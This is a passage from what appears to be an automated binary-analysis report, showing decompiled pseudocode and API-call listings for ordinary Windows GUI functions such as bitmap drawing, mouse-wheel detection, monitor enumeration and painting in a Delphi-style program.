                                                                          • Part of subcall function 00420398: RtlLeaveCriticalSection.KERNEL32(00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203AD
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00000038,00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203B6
                                                                        • 72E7A590.GDI32(00000000), ref: 0041FF63
                                                                        • SelectObject.GDI32(?,?), ref: 0041FF73
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00CC0020), ref: 0042006B
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00420079
                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 0042008D
                                                                        • StretchBlt.GDI32(?,?,?,?,?,?,?,?,00000000,?,00E20746), ref: 004200C0
                                                                        • SetTextColor.GDI32(?,?), ref: 004200D0
                                                                        • SetBkColor.GDI32(?,?), ref: 004200E0
                                                                        • SelectObject.GDI32(?,00000000), ref: 00420110
                                                                        • DeleteDC.GDI32(?), ref: 00420119
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Color$CriticalSection$EnterObjectSelectStretchText$A590DeleteLeave
                                                                        • String ID: DA
                                                                        • API String ID: 2975480410-2080325668
                                                                        • Opcode ID: a305b6964adfa08e3166ec0bdd060209ec18989792a7513b38a99bc9b876a6e0
                                                                        • Instruction ID: 352f120f49c7ce31c8e928e488b0f771bd528acb35d7a7b452884ca02f7a62cb
                                                                        • Opcode Fuzzy Hash: a305b6964adfa08e3166ec0bdd060209ec18989792a7513b38a99bc9b876a6e0
                                                                        • Instruction Fuzzy Hash: 6791B775A00118AFCB50EFA9D985D9EB7F8EF0D304B5584AAF508E7352C635ED40CB28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00407374(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                                                                        				intOrPtr* _v8;
                                                                        				struct HWND__* _t19;
                                                                        				int* _t20;
                                                                        				int* _t26;
                                                                        				int* _t27;
                                                                        
                                                                        				_t26 = _t20;
                                                                        				_t27 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                                                                        				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                                                                        				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
                                                                        				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
                                                                        				if( *_t27 == 0 || _t19 == 0) {
                                                                        					 *_a8 = 0;
                                                                        				} else {
                                                                        					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
                                                                        				}
                                                                        				if( *_t26 == 0 || _t19 == 0) {
                                                                        					 *_a4 = 3;
                                                                        				} else {
                                                                        					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
                                                                        				}
                                                                        				return _t19;
                                                                        			}









                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                                                        • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                        • API String ID: 1416857345-3736581797
                                                                        • Opcode ID: 33887b9800c1c8701772067904d4d890eaa0bc031dc26d9606312377edf2b903
                                                                        • Instruction ID: 351a13b39c766bd10c055905373aadfc2257e8037effc2ac2d33f24fba4f34ad
                                                                        • Opcode Fuzzy Hash: 33887b9800c1c8701772067904d4d890eaa0bc031dc26d9606312377edf2b903
                                                                        • Instruction Fuzzy Hash: E1118270A08345AFE700AF65CC82B26B798EF45750F204476BD44AF3C1D6B86C41D76A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E004277C4(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                                                                        				struct tagPOINT _v12;
                                                                        				int _v16;
                                                                        				struct tagRECT _v32;
                                                                        				struct tagRECT _v48;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t60;
                                                                        				int _t61;
                                                                        				RECT* _t64;
                                                                        				struct HDC__* _t65;
                                                                        
                                                                        				_t64 = _a8;
                                                                        				_t65 = _a4;
                                                                        				if( *0x496acb != 0) {
                                                                        					_t61 = 0;
                                                                        					if(_a12 == 0) {
                                                                        						L14:
                                                                        						return _t61;
                                                                        					}
                                                                        					_v32.left = 0;
                                                                        					_v32.top = 0;
                                                                        					_v32.right = GetSystemMetrics(0);
                                                                        					_v32.bottom = GetSystemMetrics(1);
                                                                        					if(_t65 == 0) {
                                                                        						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                                        							L13:
                                                                        							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                                                                        						} else {
                                                                        							_t61 = 1;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        					_v16 = GetClipBox(_t65,  &_v48);
                                                                        					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                                                                        						goto L14;
                                                                        					}
                                                                        					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                                                                        					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                                                                        						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                                        							goto L13;
                                                                        						}
                                                                        						if(_v16 == 1) {
                                                                        							_t61 = 1;
                                                                        						}
                                                                        						goto L14;
                                                                        					} else {
                                                                        						goto L13;
                                                                        					}
                                                                        				}
                                                                        				 *0x496ab8 = E00427218(7, _t60,  *0x496ab8, _t64, _t65);
                                                                        				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                                                                        				goto L14;
                                                                        			}
















                                                                        APIs
                                                                        • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004277FD
                                                                        • GetSystemMetrics.USER32 ref: 00427822
                                                                        • GetSystemMetrics.USER32 ref: 0042782D
                                                                        • GetClipBox.GDI32(?,?), ref: 0042783F
                                                                        • GetDCOrgEx.GDI32(?,?), ref: 0042784C
                                                                        • OffsetRect.USER32(?,?,?), ref: 00427865
                                                                        • IntersectRect.USER32 ref: 00427876
                                                                        • IntersectRect.USER32 ref: 0042788C
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                        • String ID: EnumDisplayMonitors
                                                                        • API String ID: 362875416-2491903729
                                                                        • Opcode ID: 509b17f4ff89f3f09313d7059f80117b772472ac54dbac4944b464566a9d4247
                                                                        • Instruction ID: 95e6c646e184b3413f1b03aee9d1c08cd6eaa1e6872ea2d6174b8da1ddef65f3
                                                                        • Opcode Fuzzy Hash: 509b17f4ff89f3f09313d7059f80117b772472ac54dbac4944b464566a9d4247
                                                                        • Instruction Fuzzy Hash: 5D311E72E0421AAFDB10DFA5DC44AEF77BCAF05314F408537F915E2241E6389905CBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E004245C2(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                        				intOrPtr _v8;
                                                                        				void* _v12;
                                                                        				char _v13;
                                                                        				struct tagPOINT _v21;
                                                                        				struct HDC__* _v28;
                                                                        				void* _v32;
                                                                        				intOrPtr _t74;
                                                                        				struct HDC__* _t76;
                                                                        				signed int _t78;
                                                                        				signed int _t79;
                                                                        				char _t80;
                                                                        				void* _t87;
                                                                        				struct HDC__* _t110;
                                                                        				void* _t131;
                                                                        				struct HDC__* _t155;
                                                                        				intOrPtr* _t159;
                                                                        				intOrPtr _t167;
                                                                        				signed int _t168;
                                                                        				intOrPtr _t171;
                                                                        				intOrPtr _t173;
                                                                        				intOrPtr _t175;
                                                                        				int* _t179;
                                                                        				intOrPtr _t181;
                                                                        				void* _t183;
                                                                        				void* _t184;
                                                                        				intOrPtr _t185;
                                                                        
                                                                        				_t160 = __ecx;
                                                                        				_t183 = _t184;
                                                                        				_t185 = _t184 + 0xffffffe4;
                                                                        				_t179 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t159 = __eax;
                                                                        				_t181 =  *((intOrPtr*)(__eax + 0x28));
                                                                        				_t167 =  *0x424810; // 0xf
                                                                        				E00420804(_v8, __ecx, _t167);
                                                                        				E00424C34(_t159);
                                                                        				_v12 = 0;
                                                                        				_v13 = 0;
                                                                        				_t74 =  *((intOrPtr*)(_t181 + 0x10));
                                                                        				if(_t74 != 0) {
                                                                        					_push(0xffffffff);
                                                                        					_push(_t74);
                                                                        					_t155 =  *(_v8 + 4);
                                                                        					_push(_t155);
                                                                        					L00406C5C();
                                                                        					_v12 = _t155;
                                                                        					_push( *(_v8 + 4));
                                                                        					L00406C2C();
                                                                        					_v13 = 1;
                                                                        				}
                                                                        				_push(0xc);
                                                                        				_t76 =  *(_v8 + 4);
                                                                        				_push(_t76);
                                                                        				L00406B8C();
                                                                        				_push(_t76);
                                                                        				_push(0xe);
                                                                        				_t78 =  *(_v8 + 4);
                                                                        				L00406B8C();
                                                                        				_t168 = _t78;
                                                                        				_t79 = _t168 * _t78;
                                                                        				if(_t79 > 8) {
                                                                        					L5:
                                                                        					_t80 = 0;
                                                                        				} else {
                                                                        					_t160 =  *(_t181 + 0x28) & 0x0000ffff;
                                                                        					if(_t79 < ( *(_t181 + 0x2a) & 0x0000ffff) * ( *(_t181 + 0x28) & 0x0000ffff)) {
                                                                        						_t80 = 1;
                                                                        					} else {
                                                                        						goto L5;
                                                                        					}
                                                                        				}
                                                                        				if(_t80 == 0) {
                                                                        					if(E00424950(_t159) == 0) {
                                                                        						SetStretchBltMode(E00420730(_v8), 3);
                                                                        					}
                                                                        				} else {
                                                                        					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                                                                        					SetStretchBltMode( *(_v8 + 4), 4);
                                                                        					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                                                                        				}
                                                                        				_push(_t183);
                                                                        				_push(0x424801);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t185;
                                                                        				if( *((intOrPtr*)( *_t159 + 0x28))() != 0) {
                                                                        					E00424BD4(_t159, _t160);
                                                                        				}
                                                                        				_t87 = E00424894(_t159);
                                                                        				_t171 =  *0x424810; // 0xf
                                                                        				E00420804(_t87, _t160, _t171);
                                                                        				if( *((intOrPtr*)( *_t159 + 0x28))() == 0) {
                                                                        					StretchBlt( *(_v8 + 4),  *_t179, _t179[1], _t179[2] -  *_t179, _t179[3] - _t179[1],  *(E00424894(_t159) + 4), 0, 0,  *(_t181 + 0x1c),  *(_t181 + 0x20),  *(_v8 + 0x20));
                                                                        					_pop(_t173);
                                                                        					 *[fs:eax] = _t173;
                                                                        					_push(E00424808);
                                                                        					if(_v13 != 0) {
                                                                        						_push(0xffffffff);
                                                                        						_push(_v12);
                                                                        						_t110 =  *(_v8 + 4);
                                                                        						_push(_t110);
                                                                        						L00406C5C();
                                                                        						return _t110;
                                                                        					}
                                                                        					return 0;
                                                                        				} else {
                                                                        					_v32 = 0;
                                                                        					_v28 = 0;
                                                                        					_push(_t183);
                                                                        					_push(0x424796);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t185;
                                                                        					L00406AE4();
                                                                        					_v28 = E00420B28(0);
                                                                        					_v32 = SelectObject(_v28,  *(_t181 + 0xc));
                                                                        					E00420CCC( *(_v8 + 4), _t159, _t179[1],  *_t179, _t179, _t181, 0, 0, _v28,  *(_t181 + 0x20),  *(_t181 + 0x1c), 0, 0,  *(E00424894(_t159) + 4), _t179[3] - _t179[1], _t179[2] -  *_t179);
                                                                        					_t131 = 0;
                                                                        					_t175 = 0;
                                                                        					 *[fs:eax] = _t175;
                                                                        					_push(0x4247db);
                                                                        					if(_v32 != 0) {
                                                                        						_t131 = SelectObject(_v28, _v32);
                                                                        					}
                                                                        					if(_v28 != 0) {
                                                                        						return DeleteDC(_v28);
                                                                        					}
                                                                        					return _t131;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                          • Part of subcall function 00424C34: 72E7AC50.USER32(00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C8A
                                                                          • Part of subcall function 00424C34: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C9F
                                                                          • Part of subcall function 00424C34: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CA9
                                                                          • Part of subcall function 00424C34: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                          • Part of subcall function 00424C34: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CD8
                                                                        • 72E7B410.GDI32(?,?,000000FF), ref: 00424606
                                                                        • 72E7B150.GDI32(?,?,?,000000FF), ref: 00424615
                                                                        • 72E7AD70.GDI32(?,0000000C), ref: 00424627
                                                                        • 72E7AD70.GDI32(?,0000000E,00000000,?,0000000C), ref: 00424636
                                                                        • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042466A
                                                                        • SetStretchBltMode.GDI32(?,00000004), ref: 00424678
                                                                        • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00424690
                                                                        • 72E7A590.GDI32(00000000,00000000,00424796,?,?,0000000E,00000000,?,0000000C), ref: 0042470D
                                                                        • SelectObject.GDI32(?,?), ref: 00424722
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Brush$A590B150B380B410CreateHalftoneModeObjectPaletteSelectStretch
                                                                        • String ID:
                                                                        • API String ID: 1694230195-0
                                                                        • Opcode ID: c6f4b90d25e3a7f91d213dfbbab5338d454019bf6aa3b904367bac129662575e
                                                                        • Instruction ID: 8a5360052a613d484358f7dafbb41ff6efc4df6e6b80e8dfa515692f2bc59ea2
                                                                        • Opcode Fuzzy Hash: c6f4b90d25e3a7f91d213dfbbab5338d454019bf6aa3b904367bac129662575e
                                                                        • Instruction Fuzzy Hash: 37516CB5B00215AFCB10EFA9D885F5ABBF8EB49304F51846AF508E7381D638ED00CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E0043AE5C(intOrPtr* __eax, void* __edx) {
                                                                        				struct HDC__* _v8;
                                                                        				void* _v12;
                                                                        				void* _v16;
                                                                        				struct tagPAINTSTRUCT _v80;
                                                                        				intOrPtr _v84;
                                                                        				void* _v96;
                                                                        				struct HDC__* _v104;
                                                                        				void* _v112;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t38;
                                                                        				struct HDC__* _t47;
                                                                        				struct HDC__* _t55;
                                                                        				intOrPtr* _t83;
                                                                        				intOrPtr _t102;
                                                                        				void* _t103;
                                                                        				void* _t108;
                                                                        				void* _t111;
                                                                        				void* _t113;
                                                                        				intOrPtr _t114;
                                                                        
                                                                        				_t111 = _t113;
                                                                        				_t114 = _t113 + 0xffffff94;
                                                                        				_push(_t103);
                                                                        				_t108 = __edx;
                                                                        				_t83 = __eax;
                                                                        				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
                                                                        					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E00439AB4(_t83) != 0) {
                                                                        						_t38 = E0043A97C(_t83, _t83, _t108, _t103, _t108);
                                                                        					} else {
                                                                        						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
                                                                        					}
                                                                        					return _t38;
                                                                        				} else {
                                                                        					L00406EB4();
                                                                        					 *((intOrPtr*)( *__eax + 0x44))();
                                                                        					 *((intOrPtr*)( *__eax + 0x44))();
                                                                        					_t47 = _v104;
                                                                        					L00406ADC();
                                                                        					_v12 = _t47;
                                                                        					L00407124();
                                                                        					L00406AE4();
                                                                        					_v8 = _t47;
                                                                        					_v16 = SelectObject(_v8, _v12);
                                                                        					 *[fs:eax] = _t114;
                                                                        					_t55 = BeginPaint(E0043CC2C(_t83),  &_v80);
                                                                        					E00437760(_t83, _v8, 0x14, _v8);
                                                                        					 *((intOrPtr*)(_t108 + 4)) = _v8;
                                                                        					E0043AE5C(_t83, _t108);
                                                                        					 *((intOrPtr*)(_t108 + 4)) = 0;
                                                                        					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x43afae, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
                                                                        					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
                                                                        					_push(_v104);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					L00406ABC();
                                                                        					EndPaint(E0043CC2C(_t83),  &_v80);
                                                                        					_t102 = _t55;
                                                                        					 *[fs:eax] = _t102;
                                                                        					_push(0x43afb5);
                                                                        					SelectObject(_v8, _v16);
                                                                        					DeleteDC(_v8);
                                                                        					return DeleteObject(_v12);
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • 72E7AC50.USER32(00000000), ref: 0043AEA7
                                                                        • 72E7A520.GDI32(00000000,?), ref: 0043AECB
                                                                        • 72E7B380.USER32(00000000,00000000,00000000,?), ref: 0043AED6
                                                                        • 72E7A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 0043AEDD
                                                                        • SelectObject.GDI32(00000000,?), ref: 0043AEED
                                                                        • BeginPaint.USER32(00000000,?,00000000,0043AFAE,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043AF0F
                                                                        • 72E897E0.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043AF6B
                                                                        • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043AF7C
                                                                        • SelectObject.GDI32(00000000,?), ref: 0043AF96
                                                                        • DeleteDC.GDI32(00000000), ref: 0043AF9F
                                                                        • DeleteObject.GDI32(?), ref: 0043AFA8
                                                                          • Part of subcall function 0043A97C: BeginPaint.USER32(00000000,?), ref: 0043A9A2
                                                                          • Part of subcall function 0043A97C: EndPaint.USER32(00000000,?,0043AAA3), ref: 0043AA96
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Paint$Object$BeginDeleteSelect$A520A590B380E897
                                                                        • String ID:
                                                                        • API String ID: 3782911080-0
                                                                        • Opcode ID: d13974afed72c26d1f8b7f13268e4a6461a7d17cbdf11dd2431701b7f6cf42ad
                                                                        • Instruction ID: 6c27e87496bbd68a0565411df090fbb30ca26b63d5b2c97abbe2d0871e1eec49
                                                                        • Opcode Fuzzy Hash: d13974afed72c26d1f8b7f13268e4a6461a7d17cbdf11dd2431701b7f6cf42ad
                                                                        • Instruction Fuzzy Hash: 11416A71B40204AFDB00EBA9CC85B9EB7F9EB4C704F10447AB50AEB281DA79AD15CB55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 39%
                                                                        			E00443D4C(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v28;
                                                                        				char _v44;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				void* _t46;
                                                                        				void* _t57;
                                                                        				intOrPtr _t85;
                                                                        				intOrPtr _t96;
                                                                        				void* _t117;
                                                                        				void* _t118;
                                                                        				void* _t127;
                                                                        				struct HDC__* _t136;
                                                                        				struct HDC__* _t137;
                                                                        				intOrPtr* _t138;
                                                                        				void* _t139;
                                                                        
                                                                        				_t119 = __ecx;
                                                                        				_t135 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t118 = __eax;
                                                                        				_t46 = E00443514(__eax);
                                                                        				if(_t46 != 0) {
                                                                        					_t142 = _a4;
                                                                        					if(_a4 == 0) {
                                                                        						__eflags =  *((intOrPtr*)(_t118 + 0x54));
                                                                        						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
                                                                        							_t138 = E004242CC(1);
                                                                        							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
                                                                        							E004256E4(_t138, 1);
                                                                        							 *((intOrPtr*)( *_t138 + 0x40))();
                                                                        							_t119 =  *_t138;
                                                                        							 *((intOrPtr*)( *_t138 + 0x34))();
                                                                        						}
                                                                        						E0041FC50( *((intOrPtr*)(E00424894( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
                                                                        						E00412BCC( *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
                                                                        						_push( &_v44);
                                                                        						_t57 = E00424894( *((intOrPtr*)(_t118 + 0x54)));
                                                                        						_pop(_t127);
                                                                        						E004202E8(_t57, _t127);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(0xffffffff);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(E00420730(E00424894( *((intOrPtr*)(_t118 + 0x54)))));
                                                                        						_push(_v8);
                                                                        						_push(E004436E8(_t118));
                                                                        						L00426AE8();
                                                                        						E00412BCC(_a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
                                                                        						_v12 = E00420730(E00424894( *((intOrPtr*)(_t118 + 0x54))));
                                                                        						E0041FC50( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0x80000014, _t135, _t139, __eflags);
                                                                        						_t136 = E00420730(_t135);
                                                                        						SetTextColor(_t136, 0xffffff);
                                                                        						SetBkColor(_t136, 0);
                                                                        						_push(0xe20746);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(_v12);
                                                                        						_push( *((intOrPtr*)(_t118 + 0x30)));
                                                                        						_push( *((intOrPtr*)(_t118 + 0x34)));
                                                                        						_push(_a12 + 1);
                                                                        						_t85 = _a16 + 1;
                                                                        						__eflags = _t85;
                                                                        						_push(_t85);
                                                                        						_push(_t136);
                                                                        						L00406ABC();
                                                                        						E0041FC50( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0x80000010, _t135, _t139, _t85);
                                                                        						_t137 = E00420730(_t135);
                                                                        						SetTextColor(_t137, 0xffffff);
                                                                        						SetBkColor(_t137, 0);
                                                                        						_push(0xe20746);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(_v12);
                                                                        						_push( *((intOrPtr*)(_t118 + 0x30)));
                                                                        						_push( *((intOrPtr*)(_t118 + 0x34)));
                                                                        						_push(_a12);
                                                                        						_t96 = _a16;
                                                                        						_push(_t96);
                                                                        						_push(_t137);
                                                                        						L00406ABC();
                                                                        						return _t96;
                                                                        					}
                                                                        					_push(_a8);
                                                                        					_push(E00443310(_t142));
                                                                        					E00443D24(_t118, _t142);
                                                                        					_push(E00443310(_t142));
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(_a12);
                                                                        					_push(_a16);
                                                                        					_push(E00420730(__ecx));
                                                                        					_push(_v8);
                                                                        					_t117 = E004436E8(_t118);
                                                                        					_push(_t117);
                                                                        					L00426AE8();
                                                                        					return _t117;
                                                                        				}
                                                                        				return _t46;
                                                                        			}





















                                                                        APIs
                                                                        • 73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00443DAB
                                                                        • 73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00443E4C
                                                                        • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00443E99
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00443EA1
                                                                        • 72E897E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 00443EC6
                                                                          • Part of subcall function 00443D24: 73452240.COMCTL32(00000000,?,00443D85,00000000,?), ref: 00443D3A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: 73452430Color$73452240E897Text
                                                                        • String ID: DA
                                                                        • API String ID: 3108427945-2080325668
                                                                        • Opcode ID: c2254ac722dfa3df87788b38a6e7611e15f13b677d4a539b87433d063c409f02
                                                                        • Instruction ID: b45212fec9e8cfc054dcf64ae06490e4be8bfbe9f25bbab4dce699ee82f4dead
                                                                        • Opcode Fuzzy Hash: c2254ac722dfa3df87788b38a6e7611e15f13b677d4a539b87433d063c409f02
                                                                        • Instruction Fuzzy Hash: C6514F71700115AFDB40EF69DD82F9E37ECAF48714F50016AB904EB382CA78ED558B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0043AAD8(void* __eax, void* __ecx, struct HDC__* __edx) {
                                                                        				struct tagRECT _v44;
                                                                        				struct tagRECT _v60;
                                                                        				void* _v68;
                                                                        				int _v80;
                                                                        				int _t79;
                                                                        				void* _t134;
                                                                        				int _t135;
                                                                        				void* _t136;
                                                                        				void* _t159;
                                                                        				void* _t160;
                                                                        				void* _t161;
                                                                        				struct HDC__* _t162;
                                                                        				intOrPtr* _t163;
                                                                        
                                                                        				_t163 =  &(_v44.bottom);
                                                                        				_t134 = __ecx;
                                                                        				_t162 = __edx;
                                                                        				_t161 = __eax;
